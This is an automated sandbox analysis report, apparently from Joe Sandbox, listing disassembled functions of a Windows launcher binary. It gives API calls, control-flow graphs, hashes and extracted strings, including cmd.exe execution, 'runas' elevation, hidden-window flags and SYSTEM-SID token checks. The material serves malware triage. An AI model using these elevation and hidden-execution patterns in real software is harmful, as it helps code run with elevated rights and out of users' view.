                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F3567C
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F35685
                                                                                                                                                                        • GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 00F35688
                                                                                                                                                                        • AllowSetForegroundWindow.USER32(00000000), ref: 00F3568B
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F356AB
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F356AE
                                                                                                                                                                        • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00F356CA
                                                                                                                                                                        • EnumWindows.USER32(00F35830,?), ref: 00F356DF
                                                                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 00F356F4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00F35711
                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00F3571B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                                                                                                                                        • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                        • API String ID: 185584925-2796270252
                                                                                                                                                                        • Opcode ID: 7de50ba8618686ecb7478f0722374a412918afdaeb6f5d1a17de9784da484436
                                                                                                                                                                        • Instruction ID: 134e8194bf6eb0830a57a0c6096559fc7859f377738eb5afaaac82be27b5d48d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7de50ba8618686ecb7478f0722374a412918afdaeb6f5d1a17de9784da484436
                                                                                                                                                                        • Instruction Fuzzy Hash: 1DE1D171E00A099BCF14EFA8CC85BAEB7B5AF84B30F544129E815EB291E7349D41EB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F36A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 103 f36a50-f36a82 104 f36aa3-f36add GetCurrentProcess OpenProcessToken 103->104 105 f36a84-f36aa2 call f52937 103->105 109 f36b09-f36b1e call f35de0 104->109 110 f36adf-f36af2 104->110 117 f36b20-f36b2c call f31770 109->117 118 f36b2e-f36b30 109->118 111 f36b02-f36b04 110->111 112 f36af4-f36afb CloseHandle 110->112 114 f36c24-f36c2b call f357c0 111->114 112->111 123 f36c31-f36c35 114->123 124 f36ddb-f36e06 call f32310 114->124 117->110 121 f36b32-f36b3d call f31770 118->121 122 f36b3f-f36ba5 call f35f40 call f324c0 118->122 121->110 139 f36ba7-f36ba9 122->139 140 f36bdb 122->140 123->124 129 f36c3b-f36c3d 123->129 135 f36f96-f36fa0 call f311d0 124->135 136 f36e0c-f36e2b call f346f0 124->136 129->124 134 f36c43-f36c59 call f32310 129->134 134->135 147 f36c5f-f36c7e call f346f0 134->147 156 f36e59-f36e6a call f32310 136->156 157 f36e2d-f36e2f 136->157 144 f36c88-f36c8a 139->144 145 f36baf-f36bb8 139->145 146 f36bdd-f36c14 call f32e60 * 2 call f31770 140->146 144->146 145->140 150 f36bba-f36bbc 145->150 146->114 180 f36c16-f36c1d FindCloseChangeNotification 146->180 171 f36c80-f36c82 147->171 172 f36cad-f36cc9 call f32310 147->172 153 f36bbf 150->153 153->140 158 f36bc1-f36bc4 153->158 156->135 173 f36e70-f36e8c call f346f0 156->173 161 f36e31-f36e33 157->161 162 f36e35-f36e3a 157->162 158->144 163 f36bca-f36bd9 158->163 167 f36e4f-f36e54 call f34ac0 161->167 168 f36e40-f36e49 162->168 163->140 163->153 167->156 168->168 178 f36e4b-f36e4d 168->178 175 f36c84-f36c86 171->175 176 f36c8f-f36c91 171->176 172->135 187 f36ccf-f36ceb call f346f0 172->187 191 f36eb9-f36ec6 call f32310 173->191 192 f36e8e-f36e90 173->192 181 f36ca3-f36ca8 call f34ac0 175->181 182 f36c94-f36c9d 176->182 178->167 180->114 181->172 182->182 185 f36c9f-f36ca1 182->185 185->181 201 f36d19-f36d26 call f32310 187->201 202 f36ced-f36cef 187->202 191->135 208 f36ecc-f36ee8 call f346f0 191->208 194 f36e92-f36e94 192->194 195 f36e96-f36e9b 192->195 198 f36eaf-f36eb4 call f34ac0 194->198 199 f36ea0-f36ea9 195->199 198->191 199->199 206 f36eab-f36ead 199->206 201->135 215 f36d2c-f36d48 call f346f0 201->215 203 f36cf1-f36cf3 202->203 204 f36cf5-f36cfa 202->204 209 f36d0f-f36d14 call f34ac0 203->209 210 f36d00-f36d09 204->210 206->198 219 f36f10-f36f28 call f352f0 208->219 220 f36eea-f36eec 208->220 209->201 210->210 213 f36d0b-f36d0d 210->213 213->209 229 f36d70-f36da4 call f34ba0 215->229 230 f36d4a-f36d4c 215->230 228 f36f2d-f36f47 219->228 222 f36ef2-f36ef4 220->222 223 f36eee-f36ef0 220->223 227 f36ef7-f36f00 222->227 226 f36f06-f36f0b call f34ac0 223->226 226->219 227->227 232 f36f02-f36f04 227->232 234 f36f51-f36f65 228->234 235 f36f49-f36f4c 228->235 246 f36da6-f36da9 229->246 247 f36dae-f36dc2 229->247 236 f36d52-f36d54 230->236 237 f36d4e-f36d50 230->237 232->226 239 f36f67-f36f6a 234->239 240 f36f6f-f36f76 234->240 235->234 241 f36d57-f36d60 236->241 238 f36d66-f36d6b call f34ac0 237->238 238->229 239->240 245 f36f79-f36f84 240->245 241->241 243 f36d62-f36d64 241->243 243->238 248 f36f86-f36f89 245->248 249 f36f8e 245->249 246->247 250 f36dc4-f36dc7 247->250 251 f36dcc-f36dd6 247->251 248->249 249->135 250->251 251->245
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00F36AC8
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00F36AD5
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F36AF5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                                        • String ID: S-1-5-18
                                                                                                                                                                        • API String ID: 4052875653-4289277601
                                                                                                                                                                        • Opcode ID: 85e7d0ca11b6dba37a99de6fc829f93296bc20a9477d0b4aadeb35ab76b33fba
                                                                                                                                                                        • Instruction ID: 6b5a88930235a78f9822cf3937a1adfa5b6790a48c98dca47f0d90926c76d5fc
                                                                                                                                                                        • Opcode Fuzzy Hash: 85e7d0ca11b6dba37a99de6fc829f93296bc20a9477d0b4aadeb35ab76b33fba
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D02AE71D00249EFDF14DFA4C9557AEBBB5EF45324F148258E802EB285EB34AE05EB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F357C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 252 f357c0-f357df GetCurrentProcess OpenProcessToken 253 f357e1-f357e6 252->253 254 f357e7-f35814 GetTokenInformation 252->254 255 f35816-f3581b 254->255 256 f3581e-f3582e CloseHandle 254->256 255->256
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,72A902E8,?,-00000010), ref: 00F357D0
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00F3580C
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F35822
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 215268677-0
                                                                                                                                                                        • Opcode ID: 4c4822466db6804b2690ddf5c0807123b41f09ac30400ebf6adc3fac2c60234b
                                                                                                                                                                        • Instruction ID: fd7409310ae79afb9092f6282b4e850dd5f0d2d674101d9897baf096793ae507
                                                                                                                                                                        • Opcode Fuzzy Hash: 4c4822466db6804b2690ddf5c0807123b41f09ac30400ebf6adc3fac2c60234b
                                                                                                                                                                        • Instruction Fuzzy Hash: 84F03674148305AFEB10AF10EC45B9A7BE8FB84710F508819FD84C2160D379955CEB63
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3CDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32(72A902E8,?,?,?,?,?,?,?,?,?,00F756D5,000000FF), ref: 00F3CDE8
                                                                                                                                                                          • Part of subcall function 00F31F80: LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00F34251,72A902E8,00000000,?,00000000,?,?,?,00F74400,000000FF,?), ref: 00F31F9D
                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00F3CEB1
                                                                                                                                                                          • Part of subcall function 00F36600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00F3667E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                        • String ID: Full command line:
                                                                                                                                                                        • API String ID: 1878577176-831861440
                                                                                                                                                                        • Opcode ID: eb3a34306c41a0d223dd9afaecf3275fa81e7de020b757bae19da0a2f9e6a115
                                                                                                                                                                        • Instruction ID: e170ca4f6d8f45fac2b2e743ab8910a728771c85f2f8b9a49b7ce29727fe5c84
                                                                                                                                                                        • Opcode Fuzzy Hash: eb3a34306c41a0d223dd9afaecf3275fa81e7de020b757bae19da0a2f9e6a115
                                                                                                                                                                        • Instruction Fuzzy Hash: 3921F471910214ABCB15FB70CC46BEE73A5AF44760F148128F406AB292EF789B08E7D2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F35E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 289 f35e40-f35ebc GetTokenInformation 290 f35f20-f35f33 289->290 291 f35ebe-f35ec7 GetLastError 289->291 291->290 292 f35ec9-f35ed7 291->292 293 f35ed9-f35edc 292->293 294 f35ede 292->294 295 f35f0b 293->295 296 f35ee0-f35ee7 294->296 297 f35f0e-f35f1a GetTokenInformation 294->297 295->297 298 f35ef7-f35f08 call f54080 296->298 299 f35ee9-f35ef5 call f360d0 296->299 297->290 298->295 299->297
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00F35E18,72A902E8,?), ref: 00F35EB4
                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00F35E18,72A902E8,?), ref: 00F35EBE
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00F35E18,72A902E8,?), ref: 00F35F1A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$ErrorLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2567405617-0
                                                                                                                                                                        • Opcode ID: 6811a739fe64946044c4788779b52c92a7ecbfc84ef17cfffb6d7066ff9c7523
                                                                                                                                                                        • Instruction ID: 4de75c67e866f319901468170eafc380815f02ee9dce1c04e70a6bf7605b1afd
                                                                                                                                                                        • Opcode Fuzzy Hash: 6811a739fe64946044c4788779b52c92a7ecbfc84ef17cfffb6d7066ff9c7523
                                                                                                                                                                        • Instruction Fuzzy Hash: ED318F71A00609AFD714CF68CC45BAFBBF9FB84B24F10452EE515E7280D7B5A9449BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F670BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 304 f670bb-f670c6 305 f670d4-f670da 304->305 306 f670c8-f670d2 304->306 308 f670f3-f67104 RtlAllocateHeap 305->308 309 f670dc-f670dd 305->309 306->305 307 f67108-f67113 call f57370 306->307 313 f67115-f67117 307->313 310 f67106 308->310 311 f670df-f670e6 call f65245 308->311 309->308 310->313 311->307 317 f670e8-f670f1 call f6bf83 311->317 317->307 317->308
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,?,00F6596A,00000001,00000364,?,00000006,000000FF,?,00F56CE7,00000000,00F63841,00000000), ref: 00F670FC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 545ad4447d07da4bbc85ac954dc0bf3ada9b4863616a04636f8eff15923ba1dc
                                                                                                                                                                        • Instruction ID: c95b09cc418eefffbe29a1368ea066740d00912f6cdb2b95088c0168ad78b5d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 545ad4447d07da4bbc85ac954dc0bf3ada9b4863616a04636f8eff15923ba1dc
                                                                                                                                                                        • Instruction Fuzzy Hash: 25F0BE32A0C3247B9B227A229C01B6A775DAF527B5B144126BD18AB190CF24EC00B6F2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F35940 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 320 f35940-f3596f 321 f35971-f3597f 320->321 322 f3598f-f359a0 320->322 323 f35981-f35982 FindCloseChangeNotification 321->323 324 f35988 321->324 323->324 324->322
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,72A902E8,00000000,?,?,?), ref: 00F35982
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                        • Opcode ID: e32b5ddd59b692dfef174d9b036d7b8b0bdaceec044f3fdce827a036d28fc825
                                                                                                                                                                        • Instruction ID: eda024a1f3d909476a16ef977dcf9ccfa1107f0a35c5141cfb0d6b1c4455d5f5
                                                                                                                                                                        • Opcode Fuzzy Hash: e32b5ddd59b692dfef174d9b036d7b8b0bdaceec044f3fdce827a036d28fc825
                                                                                                                                                                        • Instruction Fuzzy Hash: E7F0CD71A08A48EFC710DF59DD40B5AFBF8FB05B30F1042AAE814C7690D336A8008BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F31F80 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 325 f31f80-f31faf LocalAlloc
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,00F34251,72A902E8,00000000,?,00000000,?,?,?,00F74400,000000FF,?), ref: 00F31F9D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocLocal
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                                                        • Opcode ID: 052d91078c79c7297c914c4a545ef16f35ca68c2551b233a55403806abc93fbc
                                                                                                                                                                        • Instruction ID: f94e0ad2eddd51a84d075c07606353830cc3fe56224629de8d51452128de21fe
                                                                                                                                                                        • Opcode Fuzzy Hash: 052d91078c79c7297c914c4a545ef16f35ca68c2551b233a55403806abc93fbc
                                                                                                                                                                        • Instruction Fuzzy Hash: B3D012B22052125BD7444A2C9807A56A698AB94750F15852EB509D7294DA709C514750
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00F34BA0 Relevance: 33.5, APIs: 22, Instructions: 502comCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F357C0: GetCurrentProcess.KERNEL32(00000008,?,72A902E8,?,-00000010), ref: 00F357D0
                                                                                                                                                                          • Part of subcall function 00F357C0: OpenProcessToken.ADVAPI32(00000000), ref: 00F357D7
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F34C15
                                                                                                                                                                        • CoCreateInstance.OLE32(00F772B0,00000000,00000004,00F85104,00000000,?), ref: 00F34C45
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F35187
                                                                                                                                                                        • _com_issue_error.COMSUPP ref: 00F351B5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 928366108-0
                                                                                                                                                                        • Opcode ID: 6c6ba7c4846539def59969e86c8a226655708e3584824a14e5dbefd2bacb0d35
                                                                                                                                                                        • Instruction ID: 56d6bac08680c37ad43b3588f0fb0cafa7641bb154c3e17097569288c3357e9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c6ba7c4846539def59969e86c8a226655708e3584824a14e5dbefd2bacb0d35
                                                                                                                                                                        • Instruction Fuzzy Hash: 5F22D170E04388DFEF11DFA8C848BADBBB4AF45314F24819DE809EB281D775AA45DB51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3C870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00F3CBB6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00F8E6D0,00000800), ref: 00F3CBD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: OpenQueryValue
                                                                                                                                                                        • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                        • API String ID: 4153817207-482544602
                                                                                                                                                                        • Opcode ID: 39eed04246a3cb37b71f2165152178850e95e150aef96ffcc206ac3b78d76073
                                                                                                                                                                        • Instruction ID: e1c540c1a30fabfc5b6f1196756868984459c9bcc5628eefa1520380a2aeef82
                                                                                                                                                                        • Opcode Fuzzy Hash: 39eed04246a3cb37b71f2165152178850e95e150aef96ffcc206ac3b78d76073
                                                                                                                                                                        • Instruction Fuzzy Hash: BCC11335E002168BCF34AF24C81137AB7A1EF95B70F598459E889AB291E770CD82F7D0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F6DE24 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                          • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6DEE5
                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?), ref: 00F6DF10
                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00F6DFA4
                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00F6DFB2
                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F6E073
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
